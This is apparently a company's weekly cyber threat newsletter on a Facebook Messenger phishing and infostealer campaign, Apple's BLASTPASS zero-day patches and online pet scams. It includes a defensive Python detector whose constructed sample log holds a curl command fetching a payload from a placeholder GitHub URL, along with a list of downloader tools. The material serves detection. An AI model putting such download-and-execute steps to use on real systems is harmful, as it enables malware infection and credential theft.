Welcome to the latest edition of the Cyber Safe Cyber Threats Updates, a weekly series in which we bring attention to the latest cyber attacks, scams, frauds, and malware including Ransomware, to ensure you stay safe online.
Here are the most prominent threats which you should be aware of:
Phishing attacks identified targeting Facebook Messenger
A significant cybersecurity threat has emerged with phishing attacks targeting Facebook business accounts through Facebook Messenger. Guardio Labs recently released a report shedding light on this campaign, revealing that hackers are leveraging fake and compromised Facebook accounts to send out millions of phishing messages every week, all intending to infect these accounts with password-stealing malware.
The attackers employ sophisticated tactics, initiating the attack by sending deceptive Messenger messages that impersonate copyright violations or inquiries about products. These messages contain seemingly innocuous attachments concealing malicious content. Once these attachments are opened, a batch file triggers the download of malware from GitHub, designed to avoid detection and maintain persistence on the victim’s system.
The malware itself, coded in Python, employs obfuscation techniques to elude antivirus systems effectively. Its core function is to harvest valuable data from the victim’s web browser, including cookies and login information, which is then transmitted to the attackers. Subsequently, the malware logs victims out of their accounts by wiping cookies, giving hackers the time needed to take control by altering passwords.
This campaign’s sheer scale is a cause for concern, with approximately 100,000 phishing messages sent each week, primarily targeting Facebook users in various regions. Around 7% of all Facebook business accounts have fallen victim to this campaign, with 0.4% downloading the malicious content.
While manual execution is still required for account compromise, the threat remains significant. Guardio Labs also links this campaign to Vietnamese hackers based on indicators found within the malware, including using the “Coc Coc” web browser, which is prevalent in Vietnam. This highlights the ongoing threat posed by Vietnamese threat groups that target Facebook, emphasising the need for businesses to bolster their cybersecurity defences and stay informed about emerging threats.
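The infection chain described above (attachment opened, a batch file runs, the payload is fetched from GitHub, then a Python stealer executes) lends itself to a simple sequence detection over process-creation telemetry. The following is an added example written for this newsletter, not code from Guardio Labs or from the malware itself; the log format, field names, process names and the GitHub URL (an obvious placeholder) are all constructed for illustration and do not correspond to the real campaign's indicators.

```python
"""Flag the Messenger infostealer chain: archive/browser -> .bat -> GitHub fetch -> python.
Every log line below is CONSTRUCTED for this example. The pipe-delimited schema
(ts|host|parent|image|cmdline) is an assumption, not a real product's format."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    parent: str   # parent process image name
    image: str    # process image name
    cmdline: str


def parse_line(line: str) -> ProcEvent:
    """Parse one constructed event line into a ProcEvent."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return ProcEvent(datetime.fromisoformat(ts), host, parent, image, cmdline)


# Constructed sample: ws-17 shows the full chain; ws-22 and ws-31 are benign look-alikes.
SAMPLE_LOG = """\
2023-09-12T10:01:03|ws-17|explorer.exe|7zFM.exe|"C:\\Users\\bob\\Downloads\\copyright_notice.zip"
2023-09-12T10:01:20|ws-17|7zFM.exe|cmd.exe|cmd.exe /c "C:\\Users\\bob\\AppData\\Local\\Temp\\7z1\\notice.bat"
2023-09-12T10:01:22|ws-17|cmd.exe|curl.exe|curl -s -o %TEMP%\\p.zip https://github.com/example-placeholder/repo/raw/main/p.zip
2023-09-12T10:01:40|ws-17|cmd.exe|python.exe|python.exe C:\\Users\\bob\\AppData\\Local\\Temp\\p\\main.py
2023-09-12T11:15:00|ws-22|explorer.exe|cmd.exe|cmd.exe /c build.bat
2023-09-12T11:15:05|ws-22|cmd.exe|python.exe|python.exe setup.py build
2023-09-12T12:00:00|ws-31|explorer.exe|curl.exe|curl -O https://github.com/example-placeholder/tool/releases/download/v1/tool.zip
"""

# Assumed parent processes through which an emailed/messaged attachment is typically opened.
ARCHIVE_OR_BROWSER = {"7zfm.exe", "winrar.exe", "explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Assumed built-in/common downloaders a batch file might call.
DOWNLOADERS = {"curl.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe"}
GITHUB_RE = re.compile(r"https?://(?:raw\.githubusercontent\.com|github\.com)/", re.I)
STAGES = ("batch_launch", "github_fetch", "python_exec")


def stage_of(ev: ProcEvent):
    """Map a single event to a chain stage, or None if it matches no stage."""
    img, par, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    if img == "cmd.exe" and ".bat" in cmd and par in ARCHIVE_OR_BROWSER:
        return "batch_launch"
    if img in DOWNLOADERS and par == "cmd.exe" and GITHUB_RE.search(ev.cmdline):
        return "github_fetch"
    if img.startswith("python") and par == "cmd.exe":
        return "python_exec"
    return None


def detect_chain(log_text: str, window: timedelta = timedelta(minutes=10)):
    """Return one alert per host where all three stages occur, in order, within `window`
    of the batch launch. Requiring the whole sequence keeps a lone .bat or a lone
    GitHub download (both common in developer workflows) from alerting."""
    by_host = {}
    for line in log_text.splitlines():
        if line.strip():
            ev = parse_line(line)
            by_host.setdefault(ev.host, []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e.ts)
        for i, ev in enumerate(evs):
            if stage_of(ev) != "batch_launch":
                continue
            seen = {"batch_launch": ev.ts}
            for later in evs[i + 1:]:
                if later.ts - ev.ts > window:
                    break
                st = stage_of(later)
                if st and st not in seen:
                    seen[st] = later.ts
            if all(s in seen for s in STAGES) and seen["github_fetch"] <= seen["python_exec"]:
                alerts.append({"host": host, "stages": {s: seen[s].isoformat() for s in STAGES}})
    return alerts


if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_LOG):
        print(alert)
```

Only ws-17 is reported: ws-22 runs a batch file and Python but never fetches from GitHub, and ws-31 downloads from GitHub directly from the desktop rather than from a batch file, so neither completes the sequence.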
Apple Releases Emergency Updates to Fix Zero-Day Vulnerabilities
Apple has taken swift action to address two critical zero-day vulnerabilities discovered in iPhones and Macs, bringing the total number of zero-days patched this year to 13. Malicious actors actively exploited these vulnerabilities, prompting Apple to release emergency security updates.
What are the Zero-Day Vulnerabilities?
CVE-2023-41064 (Discovered by Citizen Lab):
- This vulnerability is characterised by a buffer overflow weakness.
- It is triggered when processing maliciously crafted images.
- Exploitation of this vulnerability can lead to arbitrary code execution on unpatched devices.
CVE-2023-41061 (Discovered by Apple):
- This vulnerability involves a validation issue.
- Attackers can exploit it using malicious attachments.
- Like CVE-2023-41064, it can result in arbitrary code execution on targeted devices.
Citizen Lab has revealed that these two vulnerabilities, CVE-2023-41064 and CVE-2023-41061, were actively abused as part of a zero-click iMessage exploit chain called “BLASTPASS.” This chain was used to deploy the NSO Group’s Pegasus mercenary spyware onto fully-patched iPhones. The exploit was delivered through PassKit attachments containing malicious images.
These zero-day vulnerabilities impact a wide range of Apple devices, including:
- iPhone 8 and later
- iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
- Macs running macOS Ventura
- Apple Watch Series 4 and later
Apple has promptly addressed these vulnerabilities with security updates in the following versions:
- macOS Ventura 13.5.2
- iOS 16.6.1
- iPadOS 16.6.1
- watchOS 9.6.2
Year of Zero-Day Patches
This marks the 13th zero-day vulnerability patched by Apple this year. The company has been proactive in addressing security flaws actively exploited in attacks against devices running iOS, macOS, iPadOS, and watchOS.
Just two months ago, in July, Apple issued out-of-band Rapid Security Response (RSR) updates to fix another vulnerability (CVE-2023-37450) impacting fully patched iPhones, Macs, and iPads. However, these updates partially disrupted web browsing on patched devices, necessitating the release of corrected patches shortly thereafter.
Police urge caution over Online Pet Scams
Greater Manchester has seen a recent surge in pet scams, particularly involving puppy and kitten advertisements on social media platforms. In response to four recorded cases, local police offer crime prevention advice to protect potential buyers from falling victim to fraud.
Scammers typically use popular online selling platforms like Facebook Marketplace and Gumtree to promote pets for sale. Buyers are often lured into paying a deposit without physically meeting the animal, relying solely on online images and videos. Subsequently, scammers request additional payments for expenses like insurance, vaccinations, and even “delivery” to the buyer’s location.
Detective Sergeant Stacey Shannon from GMP’s Economic Crime Unit advises the public to exercise caution, emphasising the importance of viewing the animal in person before making any payments. She encourages buyers to take their time, think critically about the purchase, and avoid rushing into decisions.
To protect against online pet fraud, potential buyers are advised to request in-person or video meetings with sellers, review seller reviews and histories, and be wary of hidden fees. Additionally, using secure payment methods like PayPal or cash for face-to-face transactions is recommended to minimise the risk of scams.
Contact Neuways to help your business become
If you need any assistance with cyber security, then please contact Neuways and we will help you where we can. Just get in touch with our team today.